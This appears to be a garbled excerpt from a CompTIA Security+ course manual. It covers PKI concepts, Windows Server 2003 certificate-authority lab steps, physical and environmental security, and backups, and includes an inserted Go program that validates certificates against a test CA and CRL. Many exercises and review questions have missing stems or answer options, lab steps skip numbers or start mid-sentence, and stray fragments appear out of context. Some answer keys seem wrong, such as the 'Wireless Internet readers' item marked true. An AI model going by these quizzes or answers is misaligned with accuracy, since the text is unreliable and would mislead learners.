If a certificate is not used for a period of time, the CA will eventually revoke it. To prevent this from taking place, a certificate owner will suspend the certificate, temporarily revoking it. Often this option is executed if an employee is on an extended leave of absence or a Web site is taken offline for renovations. The suspension is published in the CRL or OCSP with a status of Certification Hold. At the appropriate time, the suspension can be undone.
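As an added illustration (not code from the course manual), the Go program below uses the standard crypto/x509 package to act out the single-authority model, certificate validation and CRL-based revocation described in the sections above: a constructed root CA issues a certificate to CertUserX, a phony self-signed certificate bearing the same name is rejected because no trusted CA signed it, and validation also checks the validity dates and a CA-signed CRL, treating a stale CRL as unknown status rather than as proof the certificate is still good. All names, serial numbers, dates and the 7-day CRL interval are assumptions made for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"errors"
	"fmt"
	"math/big"
	"time"
)

// epoch is the constructed "current time" used for every validity decision below.
var epoch = time.Date(2024, 1, 1, 0, 0, 0, 0, time.UTC)

// mustCert signs template with signer's key; parent == template gives a self-signed certificate.
func mustCert(template, parent *x509.Certificate, pub ed25519.PublicKey, signer ed25519.PrivateKey) *x509.Certificate {
	der, err := x509.CreateCertificate(rand.Reader, template, parent, pub, signer)
	if err != nil {
		panic(err)
	}
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		panic(err)
	}
	return cert
}

// newPKI: a self-signed "Course Root CA" issues CertUserX a one-year certificate binding that name to CertUserX's key (all values constructed).
func newPKI(now time.Time) (*x509.Certificate, ed25519.PrivateKey, *x509.Certificate) {
	caPub, caKey, _ := ed25519.GenerateKey(rand.Reader)
	caTmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: "Course Root CA"},
		NotBefore: now, NotAfter: now.AddDate(10, 0, 0), IsCA: true, BasicConstraintsValid: true,
		KeyUsage: x509.KeyUsageCertSign | x509.KeyUsageCRLSign, // may sign certificates and CRLs
	}
	caCert := mustCert(caTmpl, caTmpl, caPub, caKey)
	userPub, _, _ := ed25519.GenerateKey(rand.Reader) // the private half stays with the user
	userTmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1001), Subject: pkix.Name{CommonName: "CertUserX"},
		NotBefore: now, NotAfter: now.AddDate(1, 0, 0), KeyUsage: x509.KeyUsageDigitalSignature,
	}
	return caCert, caKey, mustCert(userTmpl, caCert, userPub, caKey) // the CA's private key signs
}

// phonyCert is the attack the text warns about: a self-signed certificate with CertUserX's name but an impostor's key.
func phonyCert(now time.Time) *x509.Certificate {
	pub, key, _ := ed25519.GenerateKey(rand.Reader)
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1001), Subject: pkix.Name{CommonName: "CertUserX"},
		NotBefore: now, NotAfter: now.AddDate(1, 0, 0),
	}
	return mustCert(tmpl, tmpl, pub, key)
}

// issueCRL has the CA sign a CRL listing the given certificates; the 7-day NextUpdate stands in for the policy's revocation delay.
func issueCRL(caCert *x509.Certificate, caKey ed25519.PrivateKey, now time.Time, revoked ...*x509.Certificate) []byte {
	tmpl := &x509.RevocationList{Number: big.NewInt(1), ThisUpdate: now, NextUpdate: now.AddDate(0, 0, 7)}
	for _, c := range revoked {
		tmpl.RevokedCertificates = append(tmpl.RevokedCertificates,
			pkix.RevokedCertificate{SerialNumber: c.SerialNumber, RevocationTime: now})
	}
	der, err := x509.CreateRevocationList(rand.Reader, tmpl, caCert, caKey)
	if err != nil {
		panic(err)
	}
	return der
}

// validate mirrors what client software does before using a certificate: chain to a trusted root, check dates, then the CA-signed CRL.
func validate(cert, root *x509.Certificate, crlDER []byte, now time.Time) error {
	roots := x509.NewCertPool()
	roots.AddCert(root)
	opts := x509.VerifyOptions{Roots: roots, CurrentTime: now, KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageAny}}
	if _, err := cert.Verify(opts); err != nil {
		return err // unknown issuer, bad signature, or outside the validity period
	}
	crl, err := x509.ParseRevocationList(crlDER)
	if err == nil {
		err = crl.CheckSignatureFrom(root) // only a CRL the issuing CA actually signed is authoritative
	}
	if err != nil {
		return err
	}
	if now.After(crl.NextUpdate) {
		return errors.New("CRL is stale: revocation status unknown") // never assume "not revoked"
	}
	for _, rc := range crl.RevokedCertificates {
		if rc.SerialNumber.Cmp(cert.SerialNumber) == 0 {
			return errors.New("certificate has been revoked")
		}
	}
	return nil
}

func main() {
	caCert, caKey, userCert := newPKI(epoch)
	fmt.Println("CA-issued:", validate(userCert, caCert, issueCRL(caCert, caKey, epoch), epoch))
	fmt.Println("revoked:  ", validate(userCert, caCert, issueCRL(caCert, caKey, epoch, userCert), epoch))
}
```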
Administrative responsibilities
Setting up an enterprise PKI is an extremely complex task with enormous demands on financial, human, hardware, and software resources, in addition to the time factor. It's very important to understand the concepts, processes, and products involved, and to ask pertinent questions right at the beginning. In addition to basic support, training, and documentation issues, some of the areas that need to be explored in detail include, but are not limited to, the following:
- Support for standards, protocols, and third-party applications
- Issues related to cross-certification, interoperability, and trust models
- Multiple key pairs and key-pair uses
- Methods to PKI-enable applications and client-side software availability
- Impact on the end user for key backup, key or certificate update, and non-repudiation services
- Performance, scalability, and flexibility issues regarding distribution, retrieval, and revocation systems
- Physical access control to facilities
The security awareness in the IT industry has grown considerably, and the business community is beginning to understand the seriousness of security implications and the benefits of PKI. With the growth in e-commerce, PKI deployments are expected to continue to grow significantly over the next couple of years, despite questions on standards, policies, products, legalities, return on investment, and the technology itself.
Do it! C-1:
Exercises
1 What is the key life cycle?
The key life cycle describes the stages a key goes through during its life: generation, distribution, storage, backup, and destruction.
3 Match each phase of key management below with its definition:
Certificate generation, Certificate revocation, Key archival, Key pair generation, Key storage, Certificate renewal, Certificate validation, Key escrow, Key recovery, Registration
A browser requests signature verification of a certificate. Certificate validation
A certificate is cancelled before its expiration date. Certificate revocation
A certificate is reissued with a new validity period. Certificate renewal
A key is retrieved from archive due to loss or damage of the original. Key recovery
Matching private and public keys are created.
A private key is safely stored on a hardware or software medium.
The CA binds the requestor's identifying attributes to its public key. Certificate generation
The key is stored for an extended period of time.
The key is stored in an off-site repository for third-party access.
The user approaches the CA with a specific request for a certificate. Registration
Do it! D-1:
Here's how
1 Log on to your server as Administrator
4 Click Add/Remove Windows Components
5 Check Certificate Services. Click Yes, to accept the warning message.
6 Click Next
7 Select Stand-alone root CA. Click Next
8 Enter Course Root CA, as the Common Name for the CA.
9 Click Next
10 Change the Shared folder to C:\CertConfig, if necessary.
Click OK, if prompted.
If you receive an error message that setup failed with an error, perform the following steps: Click OK and click Finish. Restart the Add/Remove Windows Components wizard and remove Certificate Services. Then, click Start and choose Administrative Tools, Internet Information Services (IIS) Manager. Select Web Service Extensions, select All Unknown ISAPI Extensions, click Allow and click Yes. Select All Unknown CGI Extensions, click Allow and click Yes. Close Internet Information Services (IIS) Manager and start this activity over beginning with step 4.
14 Click Yes, to enable Active Server Pages.
15 Click Finish
16 Close all windows
17 Restart the computer
Client certificate
Explanation Windows Server 2003, when running certificate services and IIS, allows Web-based certificate requests. You can specify the type of certificate that you want and then wait for approval from an administrator. If you were using an Enterprise CA, the approval process would be automatic. Because you're using a Stand-alone CA, however, the certificate is pending until approved, as shown in Exhibit 14-8. All of these steps can be performed by using a Web browser and the Certification Authority MMC snap-in.
D-2:
Here's how
1 Click Start, then right-click My Computer
Right-click Users. Choose New User
3 Enter CertUserX in the User name field. Enter Password1 as the password. Uncheck User must change password at next logon.
15 Click Submit. Click Yes, to acknowledge the warning messages. Click Yes again, if prompted by another warning message.
16 View the Certificate Pending page. It provides you with information about the pending certificate request.
17 Log off CertUserX
18 Log on as Administrator
19 Click Start. Choose Administrative Tools, Certification Authority
20 Expand Course Root CA
21 Select Pending Requests
22 Right-click the certificate. Choose All Tasks, Issue
23 Select Issued Certificates, to view the issued certificate.
24 Log off Administrator
25 Log on as CertUserX
26 Launch Internet Explorer
27 In the address box, enter http://server-x/certsrv (replace server-x with the name of your server).
29 Click your certificate
30 Click Install this certificate. Click Yes. You will receive a message that the certificate was successfully installed.
31 Log off CertUserX
Do it! D-3:
Here's how
1 Log on as Administrator
2 Click Start. Choose Administrative Tools, Certification Authority
3 Right-click the Course Root CA. Choose All Tasks, Stop Service, to stop the CA service.
4 Once the service has stopped, right-click the Course Root CA. Choose All Tasks, Start Service, to restart the CA service.
5 In Windows Explorer, create a folder named C:\CABackup
6 In the Certification Authority window, right-click Course Root CA
boxes. Enter the path C:\CABackup. Click Next
9 Enter password in the Password field. Confirm the password. Click Next
Click OK
12 Click Next
13 Check all boxes, to restore everything. Enter C:\CABackup as the folder from which to restore. Click Next
14 Type password. Click Next
15 Click Finish. Click Yes
16 Restart the server
Personal certificates
Explanation There may be a time when you need to import or export your certificates. For instance, you may want to export a certificate for a backup or for use on another computer, or you may want to import a certificate for a restore or if it were sent to you by another user or computer. The file format used in this activity is Personal Information Exchange (PKCS#12). This file type enables the transfer of certificates and their keys from one computer to another.
D-4:
Here's how
1 Log on to your server as CertUserX
2 Click Start. Choose Run and enter mmc, to open a blank mmc console.
3 Choose File, Add/Remove Snap-in
4 Click Add
5 Select Certificates. Click Add
6 Click Close
7 Click OK
8 Expand Certificates Current User
9 Expand Personal
10 Select Certificates
11 View the certificate by double-clicking the name in the right pane. The screen will look similar to the one shown below.
12 Click OK, to close the window.
13 Right-click the certificate. Choose All Tasks, Export. Click Next, to begin the Certificate Export Wizard.
14 Select Yes, export the private key
16 Enter password in the Password and Confirm password fields. Click Next
17 Click Browse. Type CertUserX as the file name. Do not change the path for the file. Click Save
18 Click Next
19 Click Finish
20 Click OK, to acknowledge that the export was successful.
21 Launch Windows Explorer, to import a certificate.
Certificate revocation
Explanation Certificates are used to provide a way to verify the identity of individuals on a network. However, certificates are not 100% effective, and they can be compromised at times. Because of this, you need the ability to revoke certificates. Revoking certificates is an easy process that allows you to specify a reason for the revocation, as shown in Exhibit 14-11.
Do it! D-5:
Here's how
1 Log on as Administrator
2 Click Start. Choose Administrative Tools, Certification Authority
3 Expand Course Root CA
4 Select Issued Certificates
5 Right-click the CertUserX certificate. Choose All Tasks, Revoke Certificate
6 Select Key Compromise for the reason. Click Yes
7 Select Revoked Certificates, to verify that the certificate was revoked.
8 Right-click Revoked Certificates. Choose Properties
10 Activate the View CRLs tab
11 Close all windows
D-6:
2 Which of the following certificate file formats are supported by Windows Server 2003? (Choose all that apply.)
A PKCS #12
B PKCS #7
C DER Encoded Binary X.500
D Base64 Encoded X.509
3 The Certificate Authority service must be stopped to perform a backup using the Certificate Authority Backup Wizard. True or false?
False. Backups can be completed without stopping the service.
4 Which of the following items is not available for backup in a Stand-alone CA environment?
A Private key and CA certificate
B Configuration information
C Issued Certificate Log and pending certificate request queue
D All of the above
Review questions
1 What is the name for data that cannot be read without any manipulation?
A ASCII
B Plaintext
C Ciphertext
D Script
2 Modern cryptography uses ___________ to encrypt and decrypt data.
A probabilities
B approximations
C ratios
D algorithms
B variable-length output string
C optional output string
D plaintext output string
4 Symmetric algorithms use an encryption key that cannot be calculated from the decryption key. True or false?
False. Symmetric algorithms are algorithms in which the encryption key can be calculated from the decryption key.
5 Stream algorithms are more efficient than block algorithms. True or false?
False. Stream algorithms operate on the plaintext one bit at a time; block algorithms encrypt and decrypt the data in groups of bits.
asymmetric
B symmetric
C block
D stream
7 PKI stands for what?
A Private key intrusion
B Public key inventory
C Private key infrastructure
D
8 When PKI is used, it's the role of the CA to issue certificates to users. True or false?
True
9 Of the following, which is a more threatening situation?
A A user tries to use an expired certificate.
B A user tries to access the system from home.
C
10 A Web of Trust model relies primarily on ___________ to perpetuate trust of certificates.
A users themselves
B CAs
C introducers
D managers
11 The certificate practice statement is a published policy that explains to all users how the CA is structured. True or false?
True
12 A digital certificate is a credential that allows a recipient to verify whether a public key belongs to its owner. True or false?
True
13 Which of the following is a reason to revoke a certificate?
A The key was lost.
B The key is known to someone else.
C The key has been compromised.
D
14 Which of the following is the most widely used standard for digital certificates?
A X.400
B X.500
C X.25
D X.509
15 You can safely distribute your public key to others. True or false?
True
56
C 128
D 168
materials, power supply, and fire suppression technologies in maintaining a secure environment.
Physical controls
Explanation Physical security is subject to a different set of threats than are the previously discussed aspects of security. Physical security schemes protect not only mission-critical data, but also people, equipment, and the building itself. Many organizations employ various forms of physical security, ranging from security guards and identification badges to closed-circuit television cameras and biometric identifiers. If any of these systems fail, a breach of security can happen, and a compromise of mission-critical data can follow. When you're managing a network environment, it's critical to secure all equipment, data, power supplies, wiring, and personnel with access to the location. As with all security, the amount and type of physical security in place should vary with the importance of the data being protected. A financial services company with customer-sensitive information on its servers is more likely to take drastic steps in its physical security plan than is a simple family-owned business. To best address security, you can use various physical deterrents, including locks, surveillance, fencing, and lighting.
Physical barriers
Perhaps the cheapest and most common way to secure physical access to a facility is to use locks. Locks deter casual intruders from trying to gain access, and locks slow down attempts by more serious security threats. An organization cannot rely completely on a lock-and-key mechanism for protection, however. Locks can be opened by anyone with a key, and if there are no other control mechanisms in place, that person can walk out unnoticed with mission-critical equipment. Various forms of locks can be used as part of an effective physical security plan; among them are preset locks, cipher locks, and device locks.
Preset locks
Preset locks are the typical locks that most of us are familiar with, such as key and knob combinations or rim locks with deadbolts, as shown in Exhibit 15-1. These locks are activated by using a metal key, and they are probably the least secure, because keys are easily lost or stolen and can be used by anyone to open the lock.
Physical security
153
Exhibit 15-1: Preset lock
Cipher locks
Cipher locks are programmable and use keypads to control access into a facility. Although they are considerably more expensive than preset locks, cipher locks offer more security and more flexibility for implementing a physical security plan. Cipher-lock components are shown in Exhibit 15-2 and Exhibit 15-3.
CompTIA Security+ Certification
Cipher locks come in many forms. Some take the form of keypad inputs that allow an authorized user to enter a password or personal identification number (PIN) to gain access. These systems are much more effective than standard lock-and-key security, yet an unauthorized user might be able to gain access by using an authorized user's password or PIN. A potential attacker could very easily watch an employee or contractor enter their personal information into the keypad from afar, and use the codes to gain entry at a later date. A second form of cipher lock reads identification cards for access control. These identification cards usually have a photo of the employee or authorized user with his or her name and employee number. On the back of the card is a magnetic strip that contains the access information of that user. The card reader at the entrance can read this information and verify whether that person has access. If the card is a smart card, the system can ask for a password or PIN, which further enhances the security of the system. A slightly different card can be used with wireless proximity readers. Wireless proximity readers can sense the card when it's within a certain distance of the reader. There are two types of proximity readers: user-activated and system-sensing. User-activated proximity readers operate when the identification card transmits a sequence of values to the reader. System-sensing proximity readers can recognize the card within a specific area, and the readers do not require the user to perform any action to gain access. Cipher locks offer various options that make them a better choice than preset locks. These options include:
- Door delay: If a door is held or propped open for too long, it can trigger an alarm that causes security personnel to investigate.
- Key override: A combination can be set into the lock for use in emergencies or for supervisory needs.
- Master key ring: This function allows supervisors to change access codes and other features as needed.
- Hostage alarm: If an employee is being forced to open a secured door or other secured entry point, he can enter a specific code that will notify security personnel and/or local law enforcement.
Device locks
Device locks are available to secure computer hardware and network devices. Without such locks, equipment can be easily moved or stolen. Cable locks are perhaps the best known of the device locks. They consist of a vinyl-coated steel cable that attaches PCs, laptops, and printers to desks, chairs, and other stationary objects. An example is shown in Exhibit 15-4. In addition to cable locks, other forms of device locks are available, such as switch controls that cover on/off switches, slot locks that cover spare expansion slots, port controls that block access to disk drives or serial ports, and cable traps that prevent the removal of cabling.
Exhibit 15-4: Cable lock
Multi-criteria locks
Multi-criteria locks combine the strengths of two or more of the previously discussed lock types. A specific key or card may be required (something you have), along with a PIN number or password (something you know), and a thumbprint (something you are), to open the lock. As complexity increases, so does the cost and the security provided. The level of locking technology employed should be in proportion to the potential loss if someone were to breach that security.
Surveillance
Installing the various devices just discussed is only a partial answer to ensuring physical security. Another essential part is surveillance. Critical areas need to be watched to make sure that security policies are being followed and that unauthorized users are not trying to access the facility. Using security guards is one of the best ways to ensure physical security because guards are flexible, provide good response, and are an effective deterrent. Various intrusion detection systems and physical protection measures require human action. Guards can be placed permanently on post at vital entrances, or they can patrol the facilities to ensure that all is secure. Security guards should have a very well-defined process in place and should be fully trained on how to respond in an emergency. By combining the security mechanisms previously mentioned with security guards, an organization can optimize its physical security. Guard dogs are very effective at detecting intruders because dogs have such highly refined senses of smell and hearing. Guard dogs are also very effective deterrents just because a dog's barking will usually chase someone away. One of the challenges with using guard dogs is training them to distinguish between authorized and unauthorized users. In smaller organizations this is less of a challenge than in larger organizations with hundreds or more employees. Most of the time, guard dogs are used in tandem with security guards to present a threat to potential attackers. Physical surveillance, such as that provided by guards and guard dogs, is further enhanced by the use of visual recording devices. Closed-circuit television cameras can be placed throughout a facility and can be monitored at a central location. These cameras record all activity that takes place within critical areas and allow security personnel to assess whether or not an area is being compromised.
Fencing
Fencing can prove to be a very effective physical barrier because it can control access to entrances. Of course, the cost of fencing is directly related to the height used, the quality of the material used, and the quality of the fence installation. Therefore, a cost-benefit analysis is necessary when you're deciding on the type of fence to be used. Fences three to four feet high are used primarily to deter casual trespassers, while fences eight feet high with barbed or razor wire indicate that the facility is serious about securing the physical perimeter.
Lighting
Lighting can be used to deter intruders while providing a safer environment for personnel. The National Institute of Standards and Technology advises that critical areas should be illuminated eight feet high and two feet out to ensure the safety of personnel and visitors. The actual lighting types can vary and may include flood lights, street lights, and lights that are easily focused.
A-1:
Exercises
1 Programmable locks that use a keypad for entering a personal identification number or password are called:
A
B
C
2 Locks that prevent the removal of computer hardware and network devices are called:
A
B
C
D
A Three feet out and eight feet high
B Two feet out and eight feet high
C Three feet out and six feet high
D Two feet out and six feet high
4 Surveillance includes security guards, guard dogs, and visual recording devices. List one pro and one con for each.

Security guards
Pro: Flexible, provide good response, effective deterrent
Con: Expensive, require training

Guard dogs
Pro: Effective at detecting intruders, good deterrent
Con: Difficult to train to be able to distinguish between authorized and unauthorized users

Security cameras
Pro: Can be distributed throughout the facility and monitored at a central location
Con: Limited field of vision, can be disabled by a power outage
Biometrics
Explanation

Biometric locks are based on the substance of the person attempting to gain entrance. Thumbprints, handprints, retinal scans, and voice prints are among the many biometric criteria that can be used to positively identify a person. Biometrics verifies a user's identity by a unique personal characteristic. Because biometrics is such a sophisticated technology, the cost of implementing a biometrics system can be quite high.

Biometric systems work by scanning the personal characteristic of a user and comparing it to a previous record that was created when the user was hired or added to the system. There are many types of biometrics systems that examine different attributes. With each type, a user must enroll with the organization's security department and have his or her physical characteristic scanned, registered, and verified. Following are some of the various biometrics systems that can be used to identify a person:
• Fingerprints
• Palm prints
• Hand geometry
• Eye scans
• Signature dynamics
• Voice prints

Fingerprints and palm prints have long been recognized as valuable identification mechanisms. Every individual's finger or palm print is a unique pattern of ridges and swirls that identifies that person. As a user places his or her finger or palm on an optical scanner, the finger or palm is scanned and compared to an archival file of fingerprints or palm prints. If there is a match, that person is granted access to the facility.

Hand geometry scanners are fairly similar to fingerprint and palm scanners in that they scan the hand of a user. In this instance, instead of looking for ridges and swirls, the scanner measures the length and width of the hand and fingers. The resulting measurements are then compared to archival data, and if a match occurs, the person is granted access. Since the 9/11 attack, selected airports have stepped up the implementation of this type of technology to increase security.

Long thought to be science fiction, eye scans have become a common type of biometric validation. Retina scans compare the patterns of blood vessels on the surface of the retina to the archival database, and iris scans use the variations in color, rings, and furrows of the iris to verify identity. Wells Fargo has experimented with the installation of iris scanners at ATMs to increase security. This technology will most likely become more prevalent as time goes on.

Signature dynamics and voice prints provide other forms of biometric verification. The motions performed when writing a signature are unique to each individual, so this data can also be used for identification purposes. A voice print identifies an individual by the inflection, pitch, and intonation of his or her voice. With both technologies, the data is compared to the archive for verification. A downside to voice prints is that if a person loses his or her voice or can't speak, the person will be locked out. However, secondary verification can be used to counter this problem.
Physical security
Although biometric techniques theoretically identify an individual positively, they are known to produce both false positives and false negatives. As new security technologies based on biometrics are developed, methods for fooling the systems quickly follow. Synthetic gel-filled structures called gummy fingers can fool fingerprint, palm print, or hand geometry readers. Signature forgery can be used on a signature reader just as on a printed check; however, signature dynamics assess more than just the final shape of the signature and are more difficult to fool. New technologies that are more difficult to fool are being developed. A promising method is based on DNA analysis, which can almost conclusively link a presented sample with a recorded sample. Unfortunately, that does not prevent a malicious person from obtaining genetic material from an authorized user and presenting it to the reader. Of course, obtaining such a sample is a difficult task in itself.

Do it! A-2: Discussing biometrics
A-3:

A DDoS attack
B Social engineering attack
C SYN attack
D All of the above

2 What is piggybacking?

This is a security breach in which an unauthorized person closely follows an authorized employee into a building.

A Throw in the recycle bin.
B Use a shredder.
C Tear the document into pieces.
D Cross out private information and throw the document away.

4 How should you securely dispose of electronic media that contain confidential information? (Choose all that apply.)
A Throw in the dumpster.
B Encrypt the media; then throw in the dumpster.
C Overwrite the contents with zeros if the media are erasable.
D Physically destroy the media.

A Train employees on proper security practices.
B Install a biometric scanner at the entrance.
C Install a cipher lock at the entrance.
D Station a guard close to the entrance.
Topic B: Environment
This topic covers the following CompTIA Security+ exam objective:
5.1 Understand the application of the following concepts of physical security:
• Environment
• Wireless cells
• Location
• Shielding
• Fire suppression
Environmental considerations
Explanation

Environment refers to the surroundings in which the computers and other networking equipment reside. If the environment is not secure, data and equipment can be damaged or subjected to malicious attacks. The following factors should be considered:
• Building location and construction
• Ventilation
• Power supply
• Shielding
• Wireless cells
• Fire suppression
Equally important as location when choosing a site is the composition of the construction materials. Different materials yield different levels of protection from events such as storms, fires, and earthquakes. Whether wood, steel, or concrete is used in the construction of the building depends on what the building is going to be used for. A site used for daily operations has very different needs and legal requirements than a site used for storage.

When you're constructing or selecting a facility, it's important to evaluate the fire rating and how well reinforced the walls are. Another important consideration is the security of the doors: whether they are easily forced open; where they are located; whether they have glass; and whether the glass is shatterproof or bulletproof. Ceilings should be assessed for the combustibility of the material used, for load and weight-bearing ratings, and for the ability to install drop ceilings for any necessary cabling.

A facility's windows should be translucent or opaque to deter any unwanted observation. They should also be shatterproof, if not bulletproof, and wired for alarms. It may even be prudent to have a facility with no windows, especially if the security policy dictates. When you're assessing a facility, it's important to verify the location of shutoff valves for water and gas lines and the location of fire detection and suppression devices.

Cable installation

Physical security is impossible for many types of network facilities. For instance, wide area networks often employ fiber-optic cabling that may run hundreds or thousands of miles, and telephone cables are run on poles along the side of public streets. Although telephone cables are installed in a right-of-way, they are rarely protected by fences or other physical structures because of the prohibitive cost. These cables may be buried under agricultural fields, and many major inadvertent disruptions have been caused by the unfortunate selection of a digging site with a backhoe.

Because complete physical security is difficult in these environments, controlling organizations often implement physical security that limits the possibility of externally caused accidental breaks and that provides immediate notification that a break has occurred or is about to occur. Running communications media along other structures, such as railroad tracks, may limit the potential for breaks; this was the common location for the original telegraph wires. In 1985, Williams Companies pioneered the placement of fiber-optic cables inside decommissioned pipeline structures, which most backhoe operators try to avoid. Also, underground telephone trunks are sometimes bundled inside a sheath that is filled with compressed gas. The pressure is monitored at the central office; a substantial loss of pressure indicates that the outer protective coating has been breached. This monitoring often allows maintenance to be done on the trunk before any subscribers are aware of the difficulty.
Shielding
Common network cabling is very sensitive to electromagnetic interference (EMI) and radio frequency interference (RFI). Only properly shielded wires should be used in local area networks. Choose the best wiring that your budget permits and your environment requires. While high-quality UTP cabling does provide some protection, and coax cabling has even better resistance, fiber optics are totally immune to electrical interference.
Power failures
Power failures can be devastating to a network facility. If electricity service to a major data center or network operations center is disrupted, entire business operations units can be adversely affected. This makes efficient and effective power backups an absolute necessity. There are two main methods of protecting against power failure: an uninterruptible power supply (UPS) and backup sources.

An uninterruptible power supply uses batteries to maintain power until the primary power supply is restored. The capacity and size of these batteries vary from unit to unit. UPS units can operate on a standby basis or as online systems. Standby units stay inactive until a critical power event occurs; the system has sensors that detect fluctuations and respond accordingly. Online systems use AC line voltage to charge a bank of batteries. When in use, the UPS converts the DC output from the batteries and regulates the voltage as it powers computing devices. The capacity and size of a UPS should be related to how critical the devices being powered are to the network. If they are vital networking pieces, the UPS should have considerable battery power to maintain critical networking functions until power is restored.

Just as important as a UPS are backup power sources. If a considerable outage occurs, a backup power source, such as a generator, may be needed. Again, the size and type of an appropriate generator depend on what's needed at the facility and should be directly correlated to just how important the equipment in the facility is.

Telephone service is known to be extremely reliable, running after major disasters and during long-term power outages. Telephone companies employ multiple layers of power redundancy at the central office switch, which powers most of the connected telephones. A common implementation is for AC power from the local power-generating plant to be run through an inverter to create 48 volts of DC power, which is injected into large acid-cell batteries. The batteries are connected to the switch, providing a clean source of energy that is shielded from the fluctuations of common AC power sources. The batteries are selected and maintained so that there is sufficient time to page an engineer, have that person arrive at the central office, determine that a power outage is due to loss of central power, and start up a large diesel generator. The generator replaces commercial power and can keep the batteries charged as long as the phone company can provide diesel fuel.
The following procedures can help protect computing facilities from various power issues:
• Use surge protectors to help protect equipment from voltage fluctuation.
• Follow proper shutdown and power-up procedures to ensure that computing devices are not damaged.
• Shield long cable runs to help control the impact of electromagnetic interference.
• Avoid fluorescent lighting.
• Properly ground all equipment and racks.
• Do not daisy-chain power strips and extension cords together to create longer extension cords. If a longer cord is needed, purchase one.
Fire suppression
Fires can seriously disrupt operations and cause large amounts of damage to facilities, and should be considered a very serious threat. It's also possible that fire suppression materials may cause more damage than the fire that was extinguished, making the selection of a suppression method critical. There are national and local standards that must be met for facilities to operate. Fire detection response systems come in many forms. There are manual fire-alarm pull-down devices, as well as automatic sensors that react to smoke or heat or both. A fire detection response system is usually used with an automatic fire suppression system that uses Halon gas, carbon dioxide, water, or soda acid. The following table lists the major types of fire and the best way to suppress them.
Type of fire                  Elements of fire                  Suppression methods
Class A: Common combustibles  Wood, paper, etc.                 Pressurized water or soda acid.
Class B: Flammable liquids    Petroleum products and coolants   Halon (or replacement) gas, carbon dioxide, or soda acid.
Class C: Electrical           Electrical equipment and wiring   Nonconductive chemicals: Halon (or replacement) gas or carbon dioxide.
When wood or paper ignites, the primary cause for the fire is an increase in temperature. Water is used to put out these types of fires because it effectively lowers the temperature of the fire and then saturates the object to stop a flare-up from occurring. Carbon dioxide and soda acid smother the fire by removing oxygen, which is vital for fires to burn. Pouring water on a petroleum fire or electrical fire will not have much effect because the fire is not caused by heat. Using carbon dioxide or soda acid has an effect because they eliminate the oxygen fueling the fire. Halon gas has been used for fire suppression because it interferes with the chemical process that creates the fire. However, Halon has chemicals that deplete the ozone layer and that can be dangerous to humans in concentrations greater than 10%. For this reason, the use of Halon has been banned, and the Environmental Protection Agency has approved a list of replacements, including FM-200, NAF-S-III, Inergen, Argon, and Argonite.
Natural disasters
Another issue to keep in mind when considering the physical security of a facility is how prone the facility and surrounding areas are to natural disasters such as floods, lightning, or earthquakes. If the area is highly susceptible to such problems, it may make sense to locate the facility elsewhere. If the facility is already operational in such an area, safeguards such as flood drainage, lightning rods, and reinforced buildings should be evaluated.

Do it! B-1: Discussing environment
3 What type of UPS system uses AC voltage to charge batteries and converts the DC output from the batteries to regulate voltage?

4 What is an effective technique in ventilation systems that force air outward from a facility to help guard against dust and other pollutants?

A It eliminates oxygen.
B It reduces heat.
C It reduces the fuel intake of the fire.
D It disrupts a chemical reaction taking place.

A Electrical fire
B Paper fire
C Trash can fire
D Open area fire
Topic B

Review questions

1 Which of the following items are not forms of physical protection?
A Identification card
B Biometric device
C Access list
D Security guard

2 Which of the following are types of wireless proximity devices?
A Biometric devices and access control devices
B Swipe cards and passive devices
C Preset code devices and wireless devices

3 What is a cipher lock?
A A lock that uses cryptographic keys
B A lock that uses a type of key that cannot be reproduced
C A lock that uses a token and perimeter reader

A After a door is opened for a specific period of time, the alarm goes off.
B The door can be opened only during an emergency.
C The door has a hostage alarm capability.
D The door has supervisory override capability.

5 Technical controls are divided into which categories?
A Personnel access controls
B Surveillance
C Ventilation
D Power supply
E Fire detection and suppression
7 Standby is a type of UPS that stays active until a critical power event occurs. True or false?
False. Standby units stay inactive until a critical power event occurs.
8 A cable trap is a device that locks and prevents unauthorized unplugging of cables from computer devices. True or false?
True
9 Cipher locks are locks that secure computer hardware and network devices. True or false?
False. Cipher locks are programmable locks that use a keypad for entering a personal identification number or password.
10 The capacity and size of a UPS should be related to how critical the devices being powered are to the network. True or false?
True
11 Social engineering is a hacker's manipulation of an authorized user (or users), and of the natural human tendency to trust, in order to get unauthorized access to a system. True or false?
True
12 Cipher locks offer which options that make them a better choice than preset locks? (Choose all that apply.)
A Door delay
B Key override
C Master key ring
D Hostage alarm
E Master delay
13 Wireless Internet readers are magnetic card readers that can sense a card within a certain distance. True or false?
True
Backups
All computing hardware and media will fail. The issue is only one of timing. An essential part of any disaster recovery plan for any size organization is data backup. Backup of all mission-critical data is vital to allow personnel to restore files and application software and continue business. The method and schedule of data backups performed must be sufficient to restore those processes deemed critical. An effective backup strategy should take into account the following key issues:
What data should be backed up?

Your company may separate its data into mission-critical information and data that does not change over time, such as operating system and application files.
• Full backups back up all files selected on a system. A full backup clears the archive bit of each file after every session.
• Incremental backups save only those files that have been modified since the previous backup. The archive bit is cleared on those files that are backed up. This method is the fastest to back up but the slowest to restore, because you need to restore the last full backup and every incremental backup after that.
• Differential backups save only those files that have been changed since the last full backup. The archive bit is not cleared on those files backed up, so each differential backup is larger than the previous one. You need to restore only the last full backup and the most recent differential.

How frequently should the backups be run?

Backup schedules should take into account the importance and stability of the data. Data that changes on a daily basis, such as a transactional database, should be backed up daily. Other files, such as program files, that don't change often can be backed up on a lighter schedule, such as weekly.

What is the backup medium?

The amount of data to be backed up affects the type of medium you choose. The most common type of backup medium is magnetic tape. It can accommodate a large amount of data, offers relatively inexpensive storage, and is fast. Other media include optical disks, Zip disks, and removable hard drives.

Are the backups manual or automated?

Manual backups require an attendant to switch media once they are full or to respond to an error. If your backups are unattended, make sure that your medium's capacity is sufficient to store the entire contents of the backup. Jukebox devices, which use robotic autoloaders to switch tapes, resolve the issue of backing up multiple volumes of data.

How are backups verified?

Verification tests the data stored on the backup against the original data to ensure that the copy is an exact image of the original. Although verification roughly doubles the length of the backup process, it's the only way to ensure a good backup. In addition, you should regularly test the backup devices by performing test restores.

How long are backups stored?

